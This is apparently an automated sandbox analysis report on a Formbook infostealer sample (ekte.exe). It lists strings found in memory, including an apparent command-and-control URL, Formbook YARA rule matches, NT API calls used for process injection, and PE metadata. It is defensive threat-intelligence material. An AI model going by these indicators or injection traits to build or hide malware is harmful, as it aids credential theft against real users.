Source: ekte.exe, 00000000.00000002.376498845.000000000290A000.00000004.00000800.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409956396.00000000023BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: BuhvZTwGQCD.exe, 00000014.00000002.626793041.0000000000654000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.childlesscatlady.today
Source: BuhvZTwGQCD.exe, 00000014.00000002.626793041.0000000000654000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.childlesscatlady.today/0l08/
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: findstr.exe, 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp, sqlite3.dll.19.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: findstr.exe, 00000013.00000002.627150947.00000000029DC000.00000004.10000000.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626948129.0000000002BAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.476232018.000000000150C000.00000004.80000000.00040000.00000000.sdmp, ekte.exe, eFDiSxeTfjUqTk.exe.0.dr String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: 6z95F416.19.dr String found in binary or memory: https://www.google.com/favicon.ico

E-Banking Fraud

Source: Yara match File source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0042C483 NtClose, 8_2_0042C483
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B07AC NtCreateMutant,LdrInitializeThunk, 8_2_009B07AC
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AF9F0 NtClose,LdrInitializeThunk, 8_2_009AF9F0
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_009AFAE8
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_009AFB68
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_009AFDC0
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B00C4 NtCreateFile, 8_2_009B00C4
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B0048 NtProtectVirtualMemory, 8_2_009B0048
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B0078 NtResumeThread, 8_2_009B0078
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B0060 NtQuerySection, 8_2_009B0060
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B01D4 NtSetValueKey, 8_2_009B01D4
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B010C NtOpenDirectoryObject, 8_2_009B010C
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B0C40 NtGetContextThread, 8_2_009B0C40
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B10D0 NtOpenProcessToken, 8_2_009B10D0
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B1148 NtOpenThread, 8_2_009B1148
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AF8CC NtWaitForSingleObject, 8_2_009AF8CC
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AF900 NtReadFile, 8_2_009AF900
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AF938 NtWriteFile, 8_2_009AF938
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B1930 NtSetContextThread, 8_2_009B1930
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFAB8 NtQueryValueKey, 8_2_009AFAB8
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFAD0 NtAllocateVirtualMemory, 8_2_009AFAD0
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFA20 NtQueryInformationFile, 8_2_009AFA20
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFA50 NtEnumerateValueKey, 8_2_009AFA50
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFBB8 NtQueryInformationToken, 8_2_009AFBB8
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFBE8 NtQueryVirtualMemory, 8_2_009AFBE8
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFB50 NtCreateKey, 8_2_009AFB50
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFC90 NtUnmapViewOfSection, 8_2_009AFC90
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFC30 NtOpenProcess, 8_2_009AFC30
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFC48 NtSetInformationFile, 8_2_009AFC48
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFC60 NtMapViewOfSection, 8_2_009AFC60
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFD8C NtDelayExecution, 8_2_009AFD8C
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B1D80 NtSuspendThread, 8_2_009B1D80
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFD5C NtEnumerateKey, 8_2_009AFD5C
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFEA0 NtReadVirtualMemory, 8_2_009AFEA0
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFED0 NtAdjustPrivilegesToken, 8_2_009AFED0
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFE24 NtWriteVirtualMemory, 8_2_009AFE24
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFFB4 NtCreateSection, 8_2_009AFFB4
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFFFC NtCreateProcessEx, 8_2_009AFFFC
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFF34 NtQueueApcThread, 8_2_009AFF34
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001B44D8 0_2_001B44D8
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001B04EC 0_2_001B04EC
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001BA6B0 0_2_001BA6B0
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001BD2BD 0_2_001BD2BD
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001BD2D8 0_2_001BD2D8
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001B44C9 0_2_001B44C9
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001BE6D0 0_2_001BE6D0
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001BD710 0_2_001BD710
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001B185A 0_2_001B185A
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001B2A68 0_2_001B2A68
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001BEB08 0_2_001BEB08
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001BDB48 0_2_001BDB48
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00418473 8_2_00418473
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00403060 8_2_00403060
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00401000 8_2_00401000
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0040118B 8_2_0040118B
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00401190 8_2_00401190
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0042EAA3 8_2_0042EAA3
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00401300 8_2_00401300
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_004024E0 8_2_004024E0
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0040FCAC 8_2_0040FCAC
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0040FCB3 8_2_0040FCB3
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00416643 8_2_00416643
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0040FED3 8_2_0040FED3
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0040DEF7 8_2_0040DEF7
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0040DF49 8_2_0040DF49
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0040DF53 8_2_0040DF53
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009BE0C6 8_2_009BE0C6
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009BE2E9 8_2_009BE2E9
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A663BF 8_2_00A663BF
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009E63DB 8_2_009E63DB
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009C2305 8_2_009C2305
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A0A37B 8_2_00A0A37B
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A4443E 8_2_00A4443E
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A405E3 8_2_00A405E3
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009DC5F0 8_2_009DC5F0
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A06540 8_2_00A06540
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009C4680 8_2_009C4680
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009CE6C1 8_2_009CE6C1
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A62622 8_2_00A62622
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A0A634 8_2_00A0A634
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009CC7BC 8_2_009CC7BC
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009CC85C 8_2_009CC85C
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009E286D 8_2_009E286D
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A6098E 8_2_00A6098E
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009C29B2 8_2_009C29B2
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A549F5 8_2_00A549F5
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009D69FE 8_2_009D69FE
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A0C920 8_2_00A0C920
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A6CBA4 8_2_00A6CBA4
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A46BCB 8_2_00A46BCB
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A62C9C 8_2_00A62C9C
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A4AC5E 8_2_00A4AC5E
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009F0D3B 8_2_009F0D3B
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009CCD5B 8_2_009CCD5B
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009F2E2F 8_2_009F2E2F
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009DEE4C 8_2_009DEE4C
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A5CFB1 8_2_00A5CFB1
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A32FDC 8_2_00A32FDC
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009D0F3F 8_2_009D0F3F
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009ED005 8_2_009ED005
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009D905A 8_2_009D905A
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A3D06D 8_2_00A3D06D
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009C3040 8_2_009C3040
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A4D13F 8_2_00A4D13F
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A61238 8_2_00A61238
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009BF3CF 8_2_009BF3CF
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009C7353 8_2_009C7353
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009D1489 8_2_009D1489
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009F5485 8_2_009F5485
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009FD47D 8_2_009FD47D
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A635DA 8_2_00A635DA
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009C351F 8_2_009C351F
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A4579A 8_2_00A4579A
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009F57C3 8_2_009F57C3
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A5771D 8_2_00A5771D
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A5F8EE 8_2_00A5F8EE
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A3F8C4 8_2_00A3F8C4
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A4394B 8_2_00A4394B
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A45955 8_2_00A45955
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A73A83 8_2_00A73A83
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009BFBD7 8_2_009BFBD7
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A4DBDA 8_2_00A4DBDA
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009E7B00 8_2_009E7B00
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A5FDDD 8_2_00A5FDDD
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A4BF14 8_2_00A4BF14
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009EDF7C 8_2_009EDF7C
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_002404EC 10_2_002404EC
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_002444D8 10_2_002444D8
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_0024A6B0 10_2_0024A6B0
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_0024D2BD 10_2_0024D2BD
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_0024D2D8 10_2_0024D2D8
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_002444C9 10_2_002444C9
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_0024E6D0 10_2_0024E6D0
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_0024D710 10_2_0024D710
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_0024185A 10_2_0024185A
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_00242A68 10_2_00242A68
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_0024EB08 10_2_0024EB08
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_0024DB48 10_2_0024DB48
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E87B71 19_2_61E87B71
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E20095 19_2_61E20095
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E1606A 19_2_61E1606A
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E51001 19_2_61E51001
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E3A382 19_2_61E3A382
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E2C2C7 19_2_61E2C2C7
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E282B2 19_2_61E282B2
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E245F1 19_2_61E245F1
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E224B0 19_2_61E224B0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E3D427 19_2_61E3D427
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E6E7E0 19_2_61E6E7E0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E427CB 19_2_61E427CB
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E3E726 19_2_61E3E726
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E2F9A3 19_2_61E2F9A3
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E448FF 19_2_61E448FF
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E1BBF2 19_2_61E1BBF2
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E4DBBA 19_2_61E4DBBA
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E42D37 19_2_61E42D37
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E4EE34 19_2_61E4EE34
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll 5EA67D6B7F67301CA214AF511740F26B9E6CC9E16B2C0EC7BBA071D05B9BDE78
Source: C:\Users\user\Desktop\ekte.exe Code function: String function: 009BDF5C appears 137 times
Source: C:\Users\user\Desktop\ekte.exe Code function: String function: 00A03F92 appears 132 times
Source: C:\Users\user\Desktop\ekte.exe Code function: String function: 009BE2A8 appears 60 times
Source: C:\Users\user\Desktop\ekte.exe Code function: String function: 00A0373B appears 253 times
Source: C:\Users\user\Desktop\ekte.exe Code function: String function: 00A2F970 appears 84 times
Source: ekte.exe Static PE information: invalid certificate
Source: sqlite3.dll.19.dr Static PE information: Number of sections : 18 > 10
Source: ekte.exe, 00000000.00000000.359787899.0000000001482000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameiKZ.exe@ vs ekte.exe
Source: ekte.exe, 00000000.00000002.383376201.00000000052AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesctasks.exej% vs ekte.exe
Source: ekte.exe, 00000000.00000002.375617011.00000000006D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ekte.exe
Source: ekte.exe, 00000000.00000002.383837466.00000000067B0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs ekte.exe
Source: ekte.exe, 00000000.00000002.376498845.0000000002891000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs ekte.exe
Source: ekte.exe, 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ekte.exe
Source: ekte.exe, 00000008.00000002.417831173.00000000008C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFINDSTR.EXEj% vs ekte.exe
Source: ekte.exe, 00000008.00000002.417831173.00000000008D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFINDSTR.EXEj% vs ekte.exe
Source: ekte.exe Binary or memory string: OriginalFilenameiKZ.exe@ vs ekte.exe
Source: ekte.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
